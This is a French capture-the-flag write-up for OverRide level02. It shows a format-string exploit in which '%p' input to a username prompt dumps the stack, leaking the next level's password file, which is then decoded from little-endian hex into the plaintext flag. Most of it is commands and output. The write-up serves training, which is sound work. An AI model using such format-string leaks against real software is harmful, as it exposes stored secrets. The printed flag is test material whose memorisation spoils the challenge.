preliminaires:
on sait qu un buffer pour l'username fait 100 chars, que juste derriere celui ci
se trouve le contenu de /home/users/level03/.pass, et qu ensuite se trouve
le Password lu depuis stdin.
un flag fait 40 caracteres, le buffer de pass en fait donc 41 pour le \0

on peut voir que si l on fournis un username il est directement transmis a printf
ex:
level02@OverRide:~$ ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: %p
--[ Password: toto
*****************************************
0x7fffffffe4d0 does not have access!

bon, on a pu voir que juste apres l'username dans la stack se trouve le contenu
du fichier /home/users/level03/.pass

on va donc dump la stack avec:
level02@OverRide:~$ python -c "print('%p ' * 40)" | ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: --[ Password: *****************************************
0x7fffffffe4d0 (nil) 0x25 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6c8 0x1f7ff9a08 0x7025207025207025 0x2520702520702520 0x2070252070 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) 0x100000000 (nil) 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!

le mot de passe est la donc:
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d

mais il y a l'endianess a ne pas oublier, chalenge accepted

level02@OverRide:~$ python -c "print('756e505234376848'.decode('hex'))[::-1] + '45414a3561733951'.decode('hex')[::-1] + '377a7143574e6758'.decode('hex')[::-1] + '354a35686e475873'.decode('hex')[::-1] + '48336750664b394d'.decode('hex')[::-1]"
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H

et voila
